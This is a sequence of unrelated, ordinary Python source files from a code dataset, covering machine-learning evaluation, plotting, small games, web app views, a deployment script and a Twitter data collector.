bestF,bestThre=thresholdTuning(t,p)\n \n t=[]\n p=[]\n for i in range(valid,len(truePre)):\n t.append(truePre[i][0][la])\n p.append(pred[i][la])\n \n p=np.array(p)\n fScr[la]=f1_score(t,p>=bestThre)\n ConfusionMa[la]= confusion_matrix(t,p>bestThre)\n thresLab[la]=bestThre\n \n f=open(outputfile,\"w\")\n sum_fscore = 0.0\n for i in range(labels):\n\n sum_fscore = sum_fscore + fScr[i]\n inp=str(i)+\",\"+str(thresLab[i])+\",\"+str(fScr[i])+\"\\n\"\n f.write(inp)\n f.write(str(sum_fscore / float(labels - 1)))\n\n print(sum_fscore)\n print(sum_fscore / float((labels - 1)))\n f.close()\n return (sum_fscore / float((labels - 1)))\n\n\nif __name__ == '__main__':\n testfile = \"C:/gitrepo/Wiki-Text-Categorization/Distant Supervision/Reuter_dataset/reuters_sparse_testcvmerged.txt\"\n modelfile = \"models/model3_reuter_100\"\n outputfile = \"results/fscorelabelwise_100.txt\"\n ComputeFscore(modelfile,testfile,outputfile)\n\n# if __name__ == '__main__':\n# testfile = \"C:/gitrepo/Wiki-Text-Categorization/Distant Supervision/Reuter_dataset/reuters_sparse_test.txt\"\n \n# fscore_epochs =[]\n# startepoch = 50\n# endepoch = 100\n# epochstep = 10\n# for i in range(startepoch,endepoch,epochstep):\n# print(i)\n# modelfile = \"models/model3_reuter_\" + str(i)\n# outputfile = \"results/fscorelabelwise_\" + str(i) + \".txt\"\n# print(modelfile)\n# print(outputfile)\n# val = ComputeFscore(modelfile,testfile,outputfile)\n# fscore_epochs.append(val)\n# print(val)\n\n# print(fscore_epochs)\n# epochslist = list(np.arange(startepoch,endepoch,epochstep))\n# plt.plot(epochslist,fscore_epochs)\n\n# plt.axis([startepoch,endepoch,0,1])\n# plt.xticks(np.arange(startepoch,endepoch, epochstep))\n# plt.yticks(np.arange(0.6,1, 0.05))\n\n# plt.ylabel('fscore')\n# plt.xlabel('epochs')\n# plt.show()\n# fig = plt.figure()\n# fig.savefig('miml model3_reuter_fscores.png')\n","sub_path":"Reuter/MIML/model3/Fscore_labelwise.py","file_name":"Fscore_labelwise.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"3118390","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n\n\nN, rN = np.genfromtxt('build/output.txt', unpack=True)\n\n\nplt.plot(N, np.sqrt(rN), 'x',label=\"Daten\")\nplt.xlabel(\"$N$\")\nplt.ylabel(\"$R_N$\")\n# plt.ylim(0,np.sqrt(rN[len(rN)-1])+2)\nplt.legend(loc='best')\nplt.tight_layout()\nplt.grid()\n\nplt.savefig('build/Aufg_1_a.pdf')\nplt.close()\n############################################################################################\n\ndef func(x,n,a,b):\n return b*x**n+a\n\npopt, pcov = curve_fit(func,N,np.sqrt(rN))\nn,a,b=popt\nperr = np.sqrt(np.diag(pcov))\nprint(\"Exponent D der Fitfunktion: %.3f +- %.3f \\n\" %(n,perr[0]))\nx=np.linspace(N[0],N[len(N)-1],100)\nplt.plot(x**(n), func(x,n,a,b), 'k-',label=\"Fit R_N = a*N^D+b\" )\n\nplt.plot(N**(n), np.sqrt(rN), 'x',label=\"Daten\")\nplt.xlabel(\"$N^D$\")\nplt.ylabel(\"$R_N$\")\n# plt.ylim(0,np.sqrt(rN[len(rN)-1])+2)\nplt.legend(loc='best')\nplt.tight_layout()\nplt.grid()\n\nplt.savefig('build/Aufg_1_b.pdf')\n","sub_path":"loesung/Übung1/Aufg_1.py","file_name":"Aufg_1.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"618267397","text":"# coding=utf-8\nfrom flask import Flask\nfrom src.kde import pipeline\nfrom concurrent.futures import ThreadPoolExecutor\nfrom flask import request\nexecutor = ThreadPoolExecutor(1)\napp = 
Flask(__name__)\n\n\n# 第一个路由实现增量更新 \\v1\\?start=&end=\n@app.route('/v1/')\ndef genroadnet():\n start = request.args.get(\"start\")\n end = request.args.get(\"end\")\n executor.submit(pipeline.runUpdateData2Map,start,end)\n return 'Function is running is backend.'\n\nif __name__ == '__main__':\n # http://127.0.0.1:5000/v1/\n # 系统监听所有公网 IP\n # 交互式调试器在生产中应该设置为 debug=false\n app.run(host='0.0.0.0',debug=True)","sub_path":"src/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"234543636","text":"from random import *\nimport time\nwhile True:\n perm = input(\"\\nWould you like to roll the dice? Y/N \\n\")\n if perm == \"N\" or perm == \"n\":\n break\n else:\n print(\"\\nYou rolled a...\")\n roll = str(randint(1, 7))\n for i in range(0, int(roll)):\n print(\"...\")\n time.sleep(1)\n print(roll + \"!\")\n","sub_path":"Unit1_DiceRoll.py","file_name":"Unit1_DiceRoll.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"382525552","text":"# coding: utf8\r\nimport os\r\nimport pathlib\r\nimport typing as tp\r\n\r\ndef repo_find(workdir: tp.Union[str, pathlib.Path] = \".\") -> pathlib.Path:\r\n if 'GIT_DIR' not in os.environ:\r\n gitname = pathlib.Path('.git')\r\n else:\r\n gitname = pathlib.Path(os.environ['GIT_DIR'])\r\n while os.path.isdir(workdir):\r\n if os.path.isdir(workdir / pathlib.Path(gitname)):\r\n return workdir / gitname\r\n if workdir == '.':\r\n break\r\n workdir = pathlib.Path(os.path.dirname(workdir))\r\n raise AssertionError('Not a git repository')\r\n\r\n\r\ndef repo_create(workdir: tp.Union[str, pathlib.Path]) -> pathlib.Path:\r\n if os.path.isfile(workdir):\r\n raise AssertionError(f'{workdir} is not a directory')\r\n if 'GIT_DIR' not in os.environ:\r\n gitdir = workdir / pathlib.Path('.git')\r\n else:\r\n gitdir = workdir / pathlib.Path(os.environ['GIT_DIR'])\r\n os.mkdir(gitdir)\r\n os.makedirs(gitdir / \"refs\" / \"heads\")\r\n os.mkdir(gitdir / \"refs\" / \"tags\")\r\n os.mkdir(gitdir / \"objects\")\r\n pathlib.Path(gitdir / \"HEAD\").touch()\r\n pathlib.Path(gitdir / \"config\").touch()\r\n pathlib.Path(gitdir / \"description\").touch()\r\n current_file = open(gitdir / \"HEAD\", \"w\")\r\n current_file.write(\"ref: refs/heads/master\\n\")\r\n current_file.close()\r\n current_file = open(gitdir / \"config\", \"w\")\r\n current_file.write(\"[core]\\n\\trepositoryformatversion = 0\\n\\tfilemode = true\\n\\tbare = false\\n\\tlogallrefupdates = false\\n\")\r\n current_file.close()\r\n current_file = open(gitdir / \"description\", \"w\")\r\n current_file.write(\"Unnamed pyvcs repository.\\n\")\r\n current_file.close()\r\n return gitdir","sub_path":"homework04/pyvcs/repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"59553417","text":"# 练习2:[\"无忌\",\"赵敏\",\"周芷若\"] [101,102,103]\n# {\"无忌\":101,\"赵敏\":102,\"周芷若\":103}\n# 10:18\nlist01 = [\"无忌\", \"赵敏\", \"周芷若\"]\nlist02 = [101, 101, 103]\ndict01 = {}\n# 通过索引同时在多个列表中获取元素\nfor i in range(len(list01)):\n # key = list01[i]\n # value = list02[i]\n # dict01[key] = value\n dict01[list01[i]] = list02[i]\n\nprint(dict01)\n# 11:00\n# 需求:字典如何根据value查找key\n# 解决方案1:键值互换\ndict02 = {value: key for key, value in dict01.items()}\nprint(dict02)\nprint(dict02[101])\n# 缺点:如果key重复,交换或则丢失数据。\n# 如果需要保持所有数据\n# 
[(k,v),]\nlist02 = [(value, key) for key, value in dict01.items()]\nprint(list02)\n","sub_path":"python_one_learn/day07/exercise02.py","file_name":"exercise02.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308669543","text":"#!/usr/bin/python\n\nimport sys\nimport numpy as np\nfrom numpy import vectorize # https://stackoverflow.com/questions/8036878/function-of-numpy-array-with-if-statement\nimport matplotlib.pyplot as plt\n\n# https://docs.scipy.org/doc/scipy/reference/generated/scipy.special.betainc.html\nimport scipy.special as sc\n\n# # define constants (for SFA)\n# k = 0.3\n# C1 = 0.55\n# rho = 1.3 # target density\n# delta_i = 4. # impactor density\n# n1 = 1.2\n# n2 = 1.\n# p = 0.3\n# mu = 0.4\n# nu = 0.4\n\n# define constants (for WCB, Weakly Cemented Basalt)\nk = 0.3\nC1 = 0.18\nrho = 1.3 # target density\ndelta_i = 4. # impactor density\nn1 = 1.2\nn2 = 1.\np = 0.3\nmu = 0.46\nnu = 0.4\n\ndef Etotej(x, delta):\n\t#return 9.*k*C1**2/(8.*np.pi) * (rho/delta)**(-2.*nu/mu+1) * (x/n1)**(2/mu-3.) * sc.betainc(2.*p + 1, -2./mu + 3, 1.-x)\n\treturn 9.*k*C1**2/(8.*np.pi) * (rho/delta)**(-2.*nu/mu+1) * (x/n1)**(2/mu-3.) * (1.-x)**(2.*p+1.) * sc.hyp2f1(2.*p + 1, 2./mu - 2, 2.*p + 2, 1.-x) / (2.*p+1.) / 0.5\n\n\nx = np.logspace(-5, 0, 1000)\n\n\ndelta_i = np.linspace(0.5, 5., 10)\n\nfor d_i in delta_i:\n\tplt.plot(x, Etotej(x, d_i), label=r\"$\\delta =$ \" + f\"{d_i:.1f}\")\nplt.grid(b=True, which='both') # https://stackoverflow.com/questions/9127434/how-to-create-major-and-minor-gridlines-with-different-linestyles-in-python\n\nplt.title(\"Lunar Regolith Target (weakly cemented basalt)\\n\" r\"Regolith Bulk Density $\\rho = $\" + f\"{rho:.1f}\" +r\" g/cc, Impactor Density $\\delta$\")\nplt.xlabel(r\"Effective Impactor to Crater Radius $\\frac{n_1 a}{n_2 R}$\", fontsize=14)\nplt.ylabel(r\"Total Ejecta Kinetic Energy $E_{tot,ej} / E_{imp}$\", fontsize=14)\nplt.legend()\nplt.savefig('TotalEjectaKE_vs_EffectiveCraterSize_3.png', bbox_inches='tight', dpi=600)\nplt.show()","sub_path":"LaTeX_ReportV2/plot_Etotej.py","file_name":"plot_Etotej.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106147867","text":"import pygame\nimport sys\nimport config as c\nfrom collections import defaultdict\n\n\nclass GameEngine:\n def __init__(self, caption, width, height, back_image_filename, frame_rate):\n self.width = width\n self.height = height\n self.frame_rate = frame_rate\n self.game_over = False\n self.play = False\n self.objects = c.objects\n self.menu_objects = []\n self.player = None\n self.game_camera = None\n\n pygame.init()\n pygame.font.init()\n self.surface = pygame.display.set_mode((width, height))\n # self.surface = pygame.display.set_mode((width, height), pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.FULLSCREEN)\n\n pygame.display.set_caption(caption)\n\n # self.background_image = pygame.image.load(back_image_filename)\n\n self.background_image = pygame.Surface((width, height)) # Создание видимой поверхности\n self.background_image.fill(pygame.Color(\"#004400\"))\n '''self.background_image = pygame.Surface((width, height)) # Создание видимой поверхности\n self.background_image.fill(pygame.Color(\"#004400\"))'''\n ####\n\n self.clock = pygame.time.Clock()\n self.keydown_handlers = defaultdict(list)\n self.keyup_handlers = defaultdict(list)\n self.mouse_handlers = []\n#########\n def camera(self):\n x 
= self.player.player.x\n y = self.player.player.y\n x, y = -x + self.width / 2, -y + self.height / 2\n\n x = min(0, x) # Не движемся дальше левой границы\n x = max(-(self.game_camera.width - self.width), x) # Не движемся дальше правой границы\n y = max(-(self.game_camera.height - self.height), y) # Не движемся дальше нижней границы\n y = min(0, y) # Не движемся дальше верхней границы\n self.game_camera.x = x\n self.game_camera.y = y\n\n def update(self):\n if self.play:\n for o in self.objects:\n o.update()\n else:\n for o in self.menu_objects:\n o.update()\n\n def draw(self):\n if self.play:\n for o in self.objects:\n o.draw(self.surface, self.game_camera.topleft)\n else:\n for o in self.menu_objects:\n o.draw(self.surface)\n\n def handle_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n for handler in self.keydown_handlers[event.key]:\n handler(event.key)\n elif event.type == pygame.KEYUP:\n for handler in self.keyup_handlers[event.key]:\n handler(event.key)\n elif event.type in (pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION):\n for handler in self.mouse_handlers:\n handler(event.type, event.pos)\n\n def run(self):\n while not self.game_over:\n self.surface.blit(self.background_image, (0, 0))\n\n self.handle_events()\n self.update()\n\n if self.play:\n self.camera()\n\n self.draw()\n\n pygame.display.update()\n self.clock.tick(self.frame_rate)\n","sub_path":"game_engine.py","file_name":"game_engine.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"572823357","text":"import PIL.Image\nimport PIL.ImageTk\nfrom dbInterface import *\nimport camera\n\nfrom login import Login\n\n\nclass App:\n def __init__(self, debug):\n self.debug = debug\n\n self.root = None\n self.main_window = None\n\n self.user = None\n\n self.db_interface = None\n self.login = None\n\n # Request login credentials from user\n self.login_user()\n\n self.create_main()\n\n def login_user(self):\n self.login = Login(self.debug)\n\n self.db_interface = DbInterface(self.login.username, self.login.password, self.debug)\n\n self.user = self.db_interface.get_user()\n\n def quit(self):\n self.root.destroy()\n sys.exit()\n\n def create_main(self):\n self.root = tk.Tk()\n self.root.withdraw()\n\n self.main_window = Toplevel()\n self.main_window.configure(background=StandardValues.background)\n self.main_window.protocol('WM_DELETE_WINDOW', self.quit)\n\n StandardValues.get_screen_position(self.root)\n self.main_window.geometry(\"+{}+{}\".format(StandardValues.scr_width, StandardValues.scr_height))\n\n # SET GUI FRAMES\n top_frame = Frame(self.main_window)\n bottom_frame = Frame(self.main_window)\n bottom_frame.configure(background=\"black\")\n top_frame.pack(side=TOP)\n bottom_frame.pack(side=BOTTOM, fill=BOTH, expand=True)\n\n bottom_frame_left = Frame(bottom_frame)\n bottom_frame_right = Frame(bottom_frame)\n\n bottom_frame_left.configure(background=\"black\")\n bottom_frame_right.configure(background=\"black\")\n\n bottom_frame_left.pack(side=LEFT, fill=BOTH, expand=True)\n bottom_frame_right.pack(side=RIGHT, fill=BOTH, expand=True)\n\n # Welcome label\n welcome_lbl = Label(top_frame, bg=\"white\",\n text=\"Welcome \" + self.user.passport.firstName + \"\\nYou are logged in under \"\n + self.user.passport.loginName + \" as \" + self.user.passport.access)\n welcome_lbl.pack(side=BOTTOM, padx=10, pady=10)\n\n # ADD 
bANNER PICTURE\n path = \"../img/carpic.png\"\n img = PIL.ImageTk.PhotoImage(PIL.Image.open(path))\n panel = tk.Label(self.main_window, image=img)\n panel.pack(in_=top_frame, side=TOP, expand=\"no\")\n\n # set user type\n user_type = DISABLED\n if self.user.passport.access == \"ADMIN\":\n user_type = NORMAL\n\n # set main window properties\n self.main_window.winfo_toplevel().title(\"License Recognition Program\")\n # create all buttons\n\n add_driver_btn = Button(bottom_frame_left,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n text=\"Add New Driver\",\n command=lambda: self.db_interface.add_drivers_screen())\n\n edit_btn = Button(bottom_frame_left,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n state=user_type,\n text=\"Edit Driver\",\n command=lambda: [self.db_interface.edit_driver_search()])\n\n delete_btn = Button(bottom_frame_left,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n state=user_type,\n text=\"Delete Driver\",\n command=lambda: [self.db_interface.del_driver_screen()])\n\n search_btn = Button(bottom_frame_right,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n text=\"Search Drivers\",\n command=lambda: [self.db_interface.search_drivers()])\n\n scan_plate_btn = Button(bottom_frame_right,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n text=\"Scan Plate\",\n command=lambda: [self.db_interface.scan_license_plate_screen()])\n\n logout_btn = Button(bottom_frame_right,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n text=\"Log Out\",\n command=lambda: [self.db_interface.log_out_screen(self)])\n\n webcam_btn = Button(bottom_frame_right,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n text=\"Start Webcam\",\n command=lambda: [camera.start_stream()])\n\n # Set driver\n add_driver_btn.pack()\n\n # Adds line seperator\n seperator = Frame(height=2, bd=1, relief=SUNKEN)\n seperator.pack(fill=X, padx=50, pady=50)\n\n # set bottom part buttons\n add_driver_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n delete_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n edit_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n search_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n scan_plate_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n logout_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n webcam_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n\n self.main_window.mainloop()\n\n\ndef main():\n app = App(0)\n print(\"In use by \" + app.login.username)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/app/PlateRecMain.py","file_name":"PlateRecMain.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564536369","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import CreateView\nfrom django.views.generic import ListView\n\nfrom common.utils import split_tags\nfrom posts.forms import PostForm\nfrom posts.models import Post, Tag\n\n\nclass 
PostList(ListView):\n model = Post\n context_object_name = 'posts'\n paginate_by = 10\n\n\nclass PostCreate(LoginRequiredMixin, CreateView):\n model = Post\n form_class = PostForm\n success_url = reverse_lazy('posts:list')\n\n def form_valid(self, form):\n author = self.request.user\n title = form.cleaned_data['title']\n content = form.cleaned_data['content']\n tags_text = form.cleaned_data['tags']\n\n tag_names = split_tags(tags_text)\n tags = []\n for tag_name in tag_names:\n try:\n tag = Tag.objects.get(name=tag_name)\n except Tag.DoesNotExist:\n tag = Tag.objects.create(name=tag_name)\n tag.save()\n tags.append(tag)\n\n Post.objects.create(\n author=author, title=title, content=content, tags=tags)\n super(CreateView, self).form_valid(form)\n","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"205619804","text":"#!/usr/bin/python3\n\"\"\"Module that contains do_pack, do_deploy and deploy functions.\"\"\"\nfrom fabric.api import local, env, put, run\nfrom time import strftime\nimport os.path\nenv.hosts = ['54.160.217.25', '3.87.244.249']\n\n\ndef do_pack():\n \"\"\"Generate .tgz archive of web_static/ folder.\"\"\"\n timenow = strftime(\"%Y%M%d%H%M%S\")\n try:\n local(\"mkdir -p versions\")\n f_name = \"versions/web_static_{}.tgz\".format(timenow)\n local(\"tar -cvzf {} web_static/\".format(f_name))\n return f_name\n except:\n return None\n\n\ndef do_deploy(archive_path):\n \"\"\"Distributes archive to my web servers.\"\"\"\n if os.path.isfile(archive_path) is False:\n return False\n try:\n f_name = archive_path.split(\"/\")[-1]\n no_ext = f_name.split(\".\")[0]\n path_no_ext = \"/data/web_static/releases/{}/\".format(no_ext)\n symlink = \"/data/web_static/current\"\n put(archive_path, \"/tmp/\")\n run(\"mkdir -p {}\".format(path_no_ext))\n run(\"tar -xzf /tmp/{} -C {}\".format(f_name, path_no_ext))\n run(\"rm /tmp/{}\".format(f_name))\n run(\"mv {}web_static/* {}\".format(path_no_ext, path_no_ext))\n run(\"rm -rf {}web_static\".format(path_no_ext))\n run(\"rm -rf {}\".format(symlink))\n run(\"ln -s {} {}\".format(path_no_ext, symlink))\n return True\n except:\n return False\n\n\ndef deploy():\n \"\"\"Creates and distributes an archive.\"\"\"\n archive_path = do_pack()\n if archive_path is None:\n return False\n success = do_deploy(archive_path)\n return success\n","sub_path":"3-deploy_web_static.py","file_name":"3-deploy_web_static.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"310828487","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'MFC'\n__time__ = '2019-06-26 17:21'\n\n\"\"\"\ntype()传入3个参数时,用来创建一个类\n\"\"\"\n\nClassVariable = type('ClassA', (object,), dict(name=\"type test\"))\na = ClassVariable()\nprint(type(a))\nprint(a.name)\n\nclass ClassB:\n name = \"type test\"\n\nb = ClassB()\nprint(type(b))\nprint(b.name)","sub_path":"design_pattern/class_demo/demo_c2.py","file_name":"demo_c2.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"292938965","text":"import time\n\n\ndef hangman():\n\n # message variables\n already_guessed_message = \"You already guessed this letter.\"\n guessed_letters_message = \"Guessed letters:\"\n progress_message = \"Type anything to continue or type 'end' to quit\"\n play_again_message = \"To 
start a new game, press Y/y\"\n win_message = \"Congratulations! You have guessed the word.\"\n\n # starting and getting a word to be guessed\n print(\"The game is starting...\")\n time.sleep(1)\n print(\"Type a word to start the game: \")\n guess_word = input()\n guess_word = guess_word.lower()\n\n # checking if word doesn't have blank lines or is longer than 2 characters\n if \" \" in guess_word:\n print(\"It has to be just one word!\")\n time.sleep(1)\n hangman()\n elif len(guess_word) < 3:\n print(\"The word is too short!\")\n time.sleep(1)\n hangman()\n else:\n time.sleep(1)\n print(\"You can start guessing now.\")\n\n # creating identical lists, one will be shown to the player and the second one not\n # appending letters in normal list and stars to the fake one\n # creating variables for lives and list for guessed letters\n word_list = []\n fake_word_list = []\n for i in guess_word:\n word_list.append(i)\n fake_word_list.append(\"*\")\n time.sleep(1)\n fake_word_string = \"\".join(fake_word_list)\n print(fake_word_string)\n\n lives = 5\n guessed_letters = []\n\n # while loop to run the game\n while True:\n # guessing letter\n print(\"Take a guess: \")\n guess = input()\n if len(guess) == 2:\n print(\"Guess a single letter or a word with 3 or more characters!\")\n time.sleep(1)\n print(\"Take a guess: \")\n guess = input()\n guess = guess.lower()\n\n # checking if letter is the word\n if guess in word_list:\n time.sleep(1)\n guessed_letters.append(guess) # appends letters which have been guessed\n print(\"This letter is in the word.\")\n for i in range(int(len(guess_word))):\n if guess == fake_word_list[i]: # if the letter is already in the fake list, it has been guessed\n print(already_guessed_message)\n guessed_letters.pop() # popping the letter, because i don't want it multiple times\n print(guessed_letters_message, guessed_letters)\n elif guess == word_list[i]:\n fake_word_list[i] = guess # letter is correct and not guessed yet\n fake_word_string = \"\".join(fake_word_list)\n print(fake_word_string)\n print(progress_message)\n\n # you can input a whole word, checking if it is correct\n elif guess == guess_word:\n time.sleep(1)\n print(win_message)\n time.sleep(1)\n print(play_again_message)\n answer = input()\n if answer == \"Y\" or answer == \"y\":\n hangman()\n else:\n quit()\n\n # checking if guess is incorrect and not guessed yet\n elif guess not in word_list and guess not in guessed_letters:\n guessed_letters.append(guess)\n lives -= 1\n if lives == 1:\n time.sleep(1)\n print(\"You lost a life! You have %d life left\" % lives)\n elif lives == 0:\n time.sleep(1)\n print(\"You are dead, to start a new game pres Y/y\")\n answer = input()\n if answer == \"Y\" or answer == \"y\":\n hangman()\n else:\n quit()\n else:\n time.sleep(1)\n print(\"You lost a life! 
You have %d lives left\" % lives)\n print(progress_message)\n\n # checking if guess is incorrect but already guessed\n elif guess not in word_list and guess in guessed_letters:\n time.sleep(1)\n print(already_guessed_message)\n print(guessed_letters_message, guessed_letters)\n print(progress_message)\n\n # checking if both initial lists are the same, it means victory\n if word_list == fake_word_list:\n time.sleep(1)\n print(win_message)\n time.sleep(1)\n print(play_again_message)\n answer = input()\n if answer == \"Y\" or answer == \"y\":\n hangman()\n else:\n quit()\n if input() == \"end\":\n quit()\n\n\nhangman()\n","sub_path":"Other/Python Scripts/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"357910923","text":"#split\n\nL=['A','B','C','D']\nr=[]\nn=3\nfor i in range(n):\n r.append(L[i])\nprint(r)\n#using split\nprint(L[0:3])\n\nList=list(range(200))\nprint(\"取前20 间隔为2\")\nprint(List[0:20:2])\n\nb='i am ok!'\nprint(b[0:4])\n\n#to cut off the blank in the head and tear of the string \ndef trim(s):\n if s=='':\n return s\n if s[0]==' ':\n return trim(s[1:])\n elif s[-1]==' ':\n return trim(s[:-2])\n else :\n return s\nif trim('hello ') != 'hello':\n print('测试失败!')\nelif trim(' hello') != 'hello':\n print('测试失败!')\nelif trim(' hello ') != 'hello':\n print('测试失败!')\nelif trim(' hello world ') != 'hello world':\n print('测试失败!')\nelif trim('') != '':\n print('测试失败!')\nelif trim(' ') != '':\n print('测试失败!')\nelse:\n print('测试成功!')\ndef interator(s):\n for i,value in enumerate(s):\n print(i,value)\n\ninterator(\"hello,world!\")\n\ndef findMinAndMax(s):\n if s==[]:\n return (None,None)\n else :\n max=s[0]\n min=s[0]\n for i in s:\n if i>=max:\n max=i\n if i<=min:\n min=i\n return (min,max)\n\nif findMinAndMax([]) != (None, None):\n print('测试失败!')\nelif findMinAndMax([7]) != (7, 7):\n print('测试失败!')\nelif findMinAndMax([7, 1]) != (1, 7):\n print('测试失败!')\nelif findMinAndMax([7, 1, 3, 9, 5]) != (1, 9):\n print('测试失败!')\nelse:\n print('测试成功!')\n\n#list producer\nL1 = ['Hello', 'World', 18, 'Apple', None]\nL2=[ i.lower() for i in L1 if isinstance(i,str)]\nprint(L2)\n\n#要理解generator的工作原理,它是在for循环的过程中不断计算出下一个元素,\n#并在适当的条件结束for循环。对于函数改成的generator来说,\n#遇到return语句或者执行到函数体最后一行语句,\n#就是结束generator的指令,for循环随之结束。\n#triangles\ndef triangles():\n L=[1]\n while True:\n yield L\n L=[1]+[L[x]+L[x+1] for x in range(len(L)-1)]+[1]\n \n \nn = 0\nresults = []\nfor t in triangles():\n print(t)\n results.append(t)\n n = n + 1\n if n == 10:\n break\nprint(results)\nif results == [\n [1],\n [1, 1],\n [1, 2, 1],\n [1, 3, 3, 1],\n [1, 4, 6, 4, 1],\n [1, 5, 10, 10, 5, 1],\n [1, 6, 15, 20, 15, 6, 1],\n [1, 7, 21, 35, 35, 21, 7, 1],\n [1, 8, 28, 56, 70, 56, 28, 8, 1],\n [1, 9, 36, 84, 126, 126, 84, 36, 9, 1]\n]:\n print('测试通过!')\nelse:\n print('测试失败!')\n","sub_path":"spiltTest.py","file_name":"spiltTest.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"584139448","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 18 15:51:29 2018\n\n@author: rcarns\n\"\"\"\n\n\n\ndef RetrieveTweets(searchQuery,storagefile,maxTweets=10000):\n # the below code draws from \n # https://stackoverflow.com/questions/38555191/get-all-twitter-mentions-using-tweepy-for-users-with-millions-of-followers\n\n import tweepy\n import pandas as pd\n import numpy as np\n import pickle\n from 
connections import twitterapi\n api = twitterapi()\n \n tweetsPerQry = 100\n sinceId = None\n\n \n\n max_id = -1\n\n tweetCount = 0\n tweetProgress = 0\n #fName = 'tweetlist.txt'\n #with open(fName, 'w') as fname:\n list_of_tweets = []\n while tweetCount < maxTweets:\n try:\n if (max_id <= 0):\n if (not sinceId):\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry, tweet_mode='extended')\n else:\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n since_id=sinceId)\n else:\n if (not sinceId):\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n max_id=str(max_id - 1),tweet_mode='extended')\n else:\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n max_id=str(max_id - 1),\n since_id=sinceId)\n if not new_tweets:\n print(\"No more tweets found\")\n break\n for tweet in new_tweets:\n #print(tweet.created_at.strftime('%x %X')+' '+tweet.full_text)\n list_of_tweets.append(tweet._json)\n tweetCount += len(new_tweets)\n if tweetCount//1000>tweetProgress:\n print(\"Downloaded {0} tweets\".format(tweetCount))\n tweetProgress+=1\n max_id = new_tweets[-1].id\n except tweepy.TweepError as e:\n # Just exit if any error\n print(\"some error : \" + str(e))\n break\n\n picklefile = open(storagefile,'wb')\n pickle.dump(list_of_tweets,picklefile)\n picklefile.close()\n return tweetCount\n\ndef GetTestSet(atuser,maxtweets):\n import pickle\n import pandas as pd\n #maxtweets = 250\n if not atuser[0]=='@':\n username = atuser\n atuser = '@'+ atuser\n elif atuser[0]=='@':\n username = atuser[1:]\n import time\n retweet_filter='-filter:retweets'\n reply_filter = '-filter:replies'\n searchQuery = atuser+' AND '+retweet_filter+' AND '+reply_filter# + 'AND until:2018-09-11'\n print(searchQuery)\n #storagefile = type+'tweets'+time.strftime(\"%Y%m%d-%H%M%S\")+'.dat'\n storagefile = 